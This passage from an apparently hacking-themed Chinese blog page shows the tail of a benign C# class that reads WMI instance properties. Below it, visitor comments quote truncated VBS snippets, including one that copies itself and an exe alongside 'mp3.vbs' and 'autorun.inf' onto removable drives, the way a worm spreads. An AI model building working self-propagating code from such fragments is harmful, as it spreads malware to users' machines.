return string.Empty;

}

}

/// summary

/// 构造函数

/// /summary

/// param name="path"/param

public WMI(string path)

{

names = new StringDictionary();

mocs = new ArrayList();

try

{

ManagementClass cimobject = new ManagementClass(path);

ManagementObjectCollection moc = cimobject.GetInstances();

bool ok = false;

foreach(ManagementObject mo in moc)

{

Hashtable o = new Hashtable();

mocs.Add(o);

foreach (PropertyData p in mo.Properties)

{

o.Add(p.Name, p.Value);

if (!ok) names.Add(p.Name, p.Name);

}

ok = true;

mo.Dispose();

}

moc.Dispose();

}

catch(Exception e)

{

throw new Exception(e.Message);

}

}

/// summary

/// 构造函数

/// /summary

/// param name="path"/param

public WMI(WMIPath path): this(path.ToString())

{

}

}

}

标签:vbs黑客实例


已有3位网友发表了看法:

  • 访客

    访客  评论于 2022-07-18 13:18:16  回复

    ================================================================================== 有时候阅读别人的源码未尝不是一个好而且快捷的办法,下面就让我们来认真学习zzzEVAzzz编

  • 访客

    访客  评论于 2022-07-18 18:22:36  回复

    自身及exe文件到移动硬盘 If fso.FileExists(dri.Path"\mp3.vbs") And fso.FileExists(dri.Path"\autorun.inf"

  • 访客

    访客  评论于 2022-07-18 21:53:39  回复

    HKEY_LOCAL_MACHINE = H80000002 const HKEY_USERS=H80000003 strComputer = ipaddress //获取

欢迎 发表评论:

邮箱破解排行
最近发表
标签列表